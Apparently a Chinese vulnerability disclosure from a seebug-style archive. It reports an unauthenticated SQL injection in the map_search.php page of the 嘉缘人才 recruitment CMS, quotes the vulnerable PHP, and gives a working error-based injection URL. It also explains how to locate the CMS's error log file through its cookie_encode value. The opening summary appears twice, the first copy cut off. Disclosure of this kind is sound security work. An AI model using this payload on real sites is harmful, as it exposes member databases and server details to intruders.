### 简要描述: 无需登录,直接出数据 ### 详细说明: 看到search\map_search.php ``` if($act=='showmap'){ if($point){ $points=explode(',',$point); var_dump($points); if(count($points)<4){echo "alert('数据异常,载入失败!');";exit();} echo "$(\".map_loading\").hide(); map.clearOverlays();\r\n"; $sql="select a.m_id,a.m_name,a.m_regdate,a.m_workers,a.m_ecoclass,a.m_trade,b.m_map from {$cfg['tb_pre']}member a INNER JOIN {$cfg['tb_pre']}member_map b ON a.m_id=b.m_mid WHERE a.m_flag=1 AND $points[0]<SUBSTRING_INDEX(SUBSTRING_INDEX(b.m_map,':',-1),',',1) AND SUBSTRING_INDEX(SUBSTRING_INDEX(b.m_map,':',-1),',',1)<$points[1] AND $points[2]<SUBSTRING_INDEX(b.m_map,',',-1) AND SUBSTRING_INDEX(b.m_map,',',-1)<$points[3] $sqladd order by a.m_id desc"; $counts = $db->counter("`{$cfg['tb_pre']}member` a INNER JOIN {$cfg['tb_pre']}member_map b ON a.m_id=b.m_mid","a.m_flag=1 AND $points[0]<SUBSTRING_INDEX(SUBSTRING_INDEX(b.m_map,':',-1),',',1) AND SUBSTRING_INDEX(SUBSTRING_INDEX(b.m_map,':',-1),',',1)<$points[1] AND...
### 简要描述: 无需登录,直接出数据 ### 详细说明: 看到search\map_search.php ``` if($act=='showmap'){ if($point){ $points=explode(',',$point); var_dump($points); if(count($points)<4){echo "alert('数据异常,载入失败!');";exit();} echo "$(\".map_loading\").hide(); map.clearOverlays();\r\n"; $sql="select a.m_id,a.m_name,a.m_regdate,a.m_workers,a.m_ecoclass,a.m_trade,b.m_map from {$cfg['tb_pre']}member a INNER JOIN {$cfg['tb_pre']}member_map b ON a.m_id=b.m_mid WHERE a.m_flag=1 AND $points[0]<SUBSTRING_INDEX(SUBSTRING_INDEX(b.m_map,':',-1),',',1) AND SUBSTRING_INDEX(SUBSTRING_INDEX(b.m_map,':',-1),',',1)<$points[1] AND $points[2]<SUBSTRING_INDEX(b.m_map,',',-1) AND SUBSTRING_INDEX(b.m_map,',',-1)<$points[3] $sqladd order by a.m_id desc"; $counts = $db->counter("`{$cfg['tb_pre']}member` a INNER JOIN {$cfg['tb_pre']}member_map b ON a.m_id=b.m_mid","a.m_flag=1 AND $points[0]<SUBSTRING_INDEX(SUBSTRING_INDEX(b.m_map,':',-1),',',1) AND SUBSTRING_INDEX(SUBSTRING_INDEX(b.m_map,':',-1),',',1)<$points[1] AND $points[2]<SUBSTRING_INDEX(b.m_map,',',-1) AND SUBSTRING_INDEX(b.m_map,',',-1)<$points[3] $sqladd"); $page= isset($_GET['page'])?$_GET['page']:1;//默认页码 $getpageinfo = page($page,$counts,"",20,5); $sql.=$getpageinfo['sqllimit']; $query=$db->query($sql);$i=0;$showinfolist=$showinfotip=''; while($row=$db->fetch_array($query)){ $maps=explode(':',$row['m_map']); if(count($maps)>1){ $map=$maps[1];$i++; echo "var point$i = new BMap.Point($map); var myIcon = new BMap.Icon('{$cfg[siteurl]}{$cfg[path]}images/map/n$i.png', new BMap.Size(21,28)); var marker$i = new BMap.Marker(point$i, {icon:myIcon}); map.addOverlay(marker$i); var infoWindow$i = new BMap.InfoWindow(\"载入中...\",{width:420,height:180}); marker$i.addEventListener(\"click\", function(){ map.openInfoWindow(infoWindow$i,new BMap.Point($map)); }); infoWindow$i.addEventListener(\"open\", function(){ if (infoWindow$i.getContent()=='载入中...'){ var htmhead='<p class=\"maplayername\"><a href=\"".formatlink('company','company',$row['m_regdate'],$row['m_id'])."\" target=\"_blank\">{$row["m_name"]}</a> <b>规模:</b>{$row["m_workers"]} <b>性质:</b>{$row["m_ecoclass"]} <b>行业:</b>{$row["m_trade"]}</p>'; var htmend=''; $.get(\"$cfg[path]inc/getinfo.php\",{id: {$row[m_id]}, s: 4, hn: 20, hl: 8},function(data){ infoWindow$i.setContent(htmhead+data+htmend) }); } });\r\n"; $showinfolist.="<li><img src=\"$cfg[path]images/map/nb$i.png\" align=\"absmiddle\" > <a id=\"a$i\" target=\"_blank\" href=\"".formatlink('company','company',$row['m_regdate'],$row['m_id'])."\">".sub_cnstrs($row["m_name"],16)."</a></li>"; $showinfotip.="$('#showinfolist li a[id=\"a$i\"]').unbind().mouseover(function(){map.openInfoWindow(infoWindow$i,new BMap.Point($map));});\r\n"; } } echo "$(\"#showinfolist\").html('$showinfolist');\r\n"; echo $showinfotip; } exit(); } ``` 其中$points未加单引号直接进入sql中,根据嘉缘人才系统的伪全局变量注册机制,我们直接可以注入。但是这个注入点是通过逗号来做分隔符的,并且count要大于4,所以我们构造如下exp ``` http://127.0.0.1/frcms/search/map_search.php?act=showmap&point=1=1 or char(@`'`) or EXP(~(select * from (select user())a))%23,aaa,aaa,aaaa,aaaaaa ``` [<img src="https://images.seebug.org/upload/201506/19224207a5a36fc6bcb20de5ea80469f4a3ecc40.png" alt="QQ截图20150619223944.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201506/19224207a5a36fc6bcb20de5ea80469f4a3ecc40.png) 发现mysql报错了,这cms会把错误记录到一个文件里面。如下代码实现 ``` function log_write($message, $type = 'php') { global $cfg, $fr_time, $username; $userip = getip(); $fr_time or $fr_time = time(); $user = $username ? $username : 'guest'; dir_create(DATA_ROOT.'/log/'); $log_file = DATA_ROOT.'/log/'.$type.'_'.md5($cfg['cookie_encode']).'.txt'; $log = date('Y-m-d H:i:s', $fr_time)."||$userip||$user||".$_SERVER['SCRIPT_NAME']."||".str_replace('&', '&', $_SERVER['QUERY_STRING'])."||$message\r\n"; $olog=file_get_contents($log_file); fputs(fopen($log_file,"w"), $log.$olog); } 主要是要获取到$cfg['cookie_encode']这个值,然后就可以找到这个文件了 function _setcookie($var, $value = '', $time = 0) { global $cfg, $fr_time; $time = $time > 0 ? $fr_time+$time : (empty($value) ? $fr_time - 3600 : 0); $port = $_SERVER['SERVER_PORT'] == 443 ? 1 : 0; $var = $cfg['cookie_pre'].$var;$value&&$value=base64_encode($value.$cfg['cookie_encode']); return setcookie($var, $value, $time, $cfg['cookie_path'], $cfg['cookie_domain'], $port); } ``` 然后我们可以找到文件位置为 ### 漏洞证明: [<img src="https://images.seebug.org/upload/201506/192243187691188a798ac5430774ca5234243e90.png" alt="QQ截图20150619224103.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201506/192243187691188a798ac5430774ca5234243e90.png)
